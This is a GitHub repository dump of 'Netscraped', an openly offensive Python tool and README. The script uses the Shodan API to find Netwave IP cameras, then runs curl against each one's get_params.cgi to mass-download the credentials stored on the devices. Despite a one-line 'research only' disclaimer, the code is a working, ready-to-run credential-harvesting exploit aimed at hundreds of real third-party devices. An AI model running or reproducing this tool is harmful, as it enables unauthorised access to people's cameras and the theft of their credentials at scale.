├── .gitattributes ├── 1.png ├── 2.png ├── 3.png ├── 4.png ├── Netscraped.py └── README.md /.gitattributes: -------------------------------------------------------------------------------- 1 | *.pyc 2 | *.png 3 | *.swp 4 | api.txt 5 | venv/* 6 | -------------------------------------------------------------------------------- /1.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/649/Netscraped-Exploit/fe6aad1e169d79c32a6ebe0cc9ddff5a644b01d0/1.png -------------------------------------------------------------------------------- /2.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/649/Netscraped-Exploit/fe6aad1e169d79c32a6ebe0cc9ddff5a644b01d0/2.png -------------------------------------------------------------------------------- /3.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/649/Netscraped-Exploit/fe6aad1e169d79c32a6ebe0cc9ddff5a644b01d0/3.png -------------------------------------------------------------------------------- /4.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/649/Netscraped-Exploit/fe6aad1e169d79c32a6ebe0cc9ddff5a644b01d0/4.png -------------------------------------------------------------------------------- /Netscraped.py: -------------------------------------------------------------------------------- 1 | #-- coding: utf8 -- 2 | #!/usr/bin/env python3 3 | import os, sys, time 4 | from pathlib import Path 5 | import shodan 6 | 7 | class color: 8 | HEADER = '\033[0m' 9 | 10 | keys = Path("./api.txt") 11 | 12 | logo = color.HEADER + ''' 13 | 14 | ███╗ ██╗███████╗████████╗███████╗ ██████╗██████╗ █████╗ ██████╗ ███████╗██████╗ 15 | ████╗ ██║██╔════╝╚══██╔══╝██╔════╝██╔════╝██╔══██╗██╔══██╗██╔══██╗██╔════╝██╔══██╗ 16 | ██╔██╗ ██║█████╗ ██║ ███████╗██║ ██████╔╝███████║██████╔╝█████╗ ██║ ██║ 17 | ██║╚██╗██║██╔══╝ ██║ ╚════██║██║ ██╔══██╗██╔══██║██╔═══╝ ██╔══╝ ██║ ██║ 18 | ██║ ╚████║███████╗ ██║ ███████║╚██████╗██║ ██║██║ ██║██║ ███████╗██████╔╝ 19 | ╚═╝ ╚═══╝╚══════╝ ╚═╝ ╚══════╝ ╚═════╝╚═╝ ╚═╝╚═╝ ╚═╝╚═╝ ╚══════╝╚═════╝ 20 | 21 | Author: @037 22 | Version: 1.0 23 | 24 | ####################################### DISCLAIMER ########################################## 25 | | Netscraped is a tool used to obtain hundreds of vulnerable Netwave IP cameras and then | 26 | | finds all the credentials stored on the affected device. It does so by simply using cURL | 27 | | to grab "get_params.cgi" which contains all the credentials to the device. This tool also | 28 | | uses Shodan.io API to find vulnerable Netwave based IP cameras. Use for research only. | 29 | ############################################################################################# 30 | 31 | ''' 32 | print(logo) 33 | 34 | if len(sys.argv) > 2: 35 | ip_address = (sys.argv[1]).rstrip() 36 | url = ip_address+':'+sys.argv[2]+'/get_params.cgi' 37 | if len(sys.argv) == 4: 38 | creds = 'admin'+sys.argv[3] 39 | else: 40 | creds = 'admin:' 41 | os.system('curl -s --max-time %s --output %s --user %s %s'%('30', './'+ip_address+'.txt', creds, url)) 42 | print("[*] Fetched %s stored as %s.txt" % (url, ip_address)) 43 | quit() 44 | else: 45 | print("[*] Single server exploitation w/o Shodan: %s " % sys.argv[0]) 46 | 47 | if keys.is_file(): 48 | with open('api.txt', 'r') as file: 49 | SHODAN_API_KEY=file.readline().rstrip('\n') 50 | else: 51 | file = open('api.txt', 'w') 52 | SHODAN_API_KEY = input('[*] Please enter a valid Shodan.io API Key: ') 53 | file.write(SHODAN_API_KEY) 54 | print('[~] File written: ./api.txt') 55 | file.close() 56 | 57 | source_file = 'netwave.txt' 58 | vuln_file = 'get_params.cgi' 59 | counter=0 60 | timeout = 30 61 | 62 | shodan_api = SHODAN_API_KEY 63 | 64 | semicreds = input('[*] Enter hardcoded Netwave password (Default ): ') or '' 65 | creds = 'admin:'+semicreds 66 | 67 | engage = input('[*] Ready to engage targets? : ').lower() 68 | print('') 69 | if engage.startswith('y'): 70 | output_dir = 'results' 71 | search_term = 'Content-Length:372' 72 | 73 | def src_file(shodan_api, source_file, search_term): 74 | api = shodan.Shodan(shodan_api) 75 | results = api.search(search_term) 76 | try: 77 | with open(source_file,'a') as ras: 78 | for addr in results['matches']: 79 | ras.write(str(addr['ip_str'])+':'+str(addr['port'])+'\n') 80 | ras.close() 81 | except shodan.APIError as e: 82 | print('[✘] Error: %s' % e) 83 | sys.exit() 84 | 85 | 86 | def pawn(shodan_api,search_term,counter,source_file,vuln_file,creds,output_dir,timeout): 87 | if(os.path.isdir('./'+output_dir)==False): 88 | os.makedirs(output_dir) 89 | 90 | if(os.path.isdir('./'+output_dir+'/error_responses')==False): 91 | os.makedirs(output_dir+'/error_responses') 92 | 93 | if(os.path.isfile('./'+source_file)==False): 94 | print('[*] File not found\n[~] Creating file using Shodan...') 95 | src_file(shodan_api, source_file, search_term) 96 | 97 | if(os.path.getsize(source_file)==0): 98 | print('[*] File is empty\n[*] Getting IP adddresses using Shodan...') 99 | src_file(shodan_api, source_file, search_term) 100 | 101 | with open(source_file,'r') as f: 102 | lines = f.readlines() 103 | while True: 104 | try: 105 | server = lines[counter] 106 | server = server.rstrip() 107 | server = server.split(':') 108 | ip_addr = (server[0]+':'+server[1]).rstrip() 109 | filename = (server[0]+'_'+server[1]+'.txt').rstrip() 110 | file_path = os.path.join(output_dir,filename) 111 | print('[+] %4s: '%str(counter)+ip_addr) 112 | url = ip_addr+'/'+vuln_file 113 | 114 | os.system('curl -s --max-time %s --output %s --user %s %s'%(timeout, file_path, creds, url)) 115 | 116 | err_path = os.path.join(output_dir+'/error_responses',filename) 117 | try: 118 | if(os.path.getsize(file_path) < 3000): 119 | os.rename(file_path, err_path) 120 | except: 121 | pass 122 | counter=counter+1 123 | except KeyboardInterrupt: 124 | print('[*] Interrupted! , exiting..') 125 | f.close() 126 | sys.exit(0) 127 | except IndexError: 128 | print('') 129 | print('\n [*] Finished!') 130 | f.close() 131 | sys.exit(0) 132 | except: 133 | print('[*] Some error occurred!') 134 | raise 135 | f.close() 136 | sys.exit(0) 137 | 138 | if __name__ == "__main__": 139 | pawn(shodan_api,search_term,counter,source_file,vuln_file,creds,output_dir,timeout) -------------------------------------------------------------------------------- /README.md: -------------------------------------------------------------------------------- 1 | # NETSCRAPED EXPLOIT TOOL 2 | 3 | * Author: [@037](https://twitter.com/037) 4 | 5 | This tool allows you obtain all the credentials stored on Netwave IP cameras 6 | 7 | ### Prerequisites 8 | 9 | You're required to install Python 3.x 10 | 11 | ``` 12 | apt-get install python3 13 | ``` 14 | 15 | You also require to have Shodan module installed 16 | 17 | ``` 18 | pip install shodan 19 | ``` 20 | 21 | You need cURL for this to work as well 22 | ``` 23 | apt-get install curl 24 | ``` 25 | 26 | If you have Windows, follow these [instructions](http://www.oracle.com/webfolder/technetwork/tutorials/obe/cloud/13_2/messagingservice/files/installing_curl_command_line_tool_on_windows.html) to download cURL. 27 | * Make sure to place cURL in your $PATH (especially on windows) 28 | 29 | 30 | ### Using Shodan API 31 | 32 | This tool requires you to own an upgraded Shodan API 33 | 34 | You may obtain one for free in [Shodan](https://shodan.io/) if you sign up using a .edu email 35 | 36 | ![alt text](https://raw.githubusercontent.com/649/Netscraped-Exploit/master/1.png) 37 | ![alt text](https://raw.githubusercontent.com/649/Netscraped-Exploit/master/2.png) 38 | ![alt text](https://raw.githubusercontent.com/649/Netscraped-Exploit/master/3.png) 39 | ![alt text](https://raw.githubusercontent.com/649/Netscraped-Exploit/master/4.png) 40 | 41 | --------------------------------------------------------------------------------